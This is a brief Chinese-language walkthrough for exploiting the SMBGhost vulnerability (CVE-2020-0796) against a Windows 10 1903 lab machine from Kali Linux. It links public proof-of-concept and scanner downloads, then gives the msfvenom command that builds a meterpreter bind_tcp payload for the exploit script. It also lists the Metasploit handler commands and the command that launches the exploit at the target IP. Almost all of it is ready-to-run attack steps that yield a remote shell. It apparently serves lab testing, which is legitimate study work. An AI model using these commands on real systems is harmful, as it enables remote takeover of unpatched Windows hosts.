測(cè)試環(huán)境及工具
- kali :192.168.1.106
- 靶機(jī):192.168.1.107
1.jpg
2.jpg
靶機(jī)下載地址:
ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|
藍(lán)屏的poc
https://github.com/eerykitty/CVE-2020-0796-PoC
奇安信的檢查工具 地址http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
本次利用的腳本https://github.com/chompie1337/SMBGhost_RCE_PoC.git
- 使用kali生成利用腳本(設(shè)置kali監(jiān)聽(tīng)地址)
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=(kali ip) LPORT=1234 -f py -o test.py
然后把生成的腳本內(nèi)容替換到exploit的USER_PAYLOAD的內(nèi)容
3.jpg
4.jpg
5.jpg
- 進(jìn)入msf監(jiān)聽(tīng)
進(jìn)入metasploit
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 1234
set rhost 192.168.1.107 (靶機(jī)IP)
show options 查看
exploit
- 運(yùn)行exploit腳本
運(yùn)行
python3 exploit.py -ip 192.168.1.107
7.jpg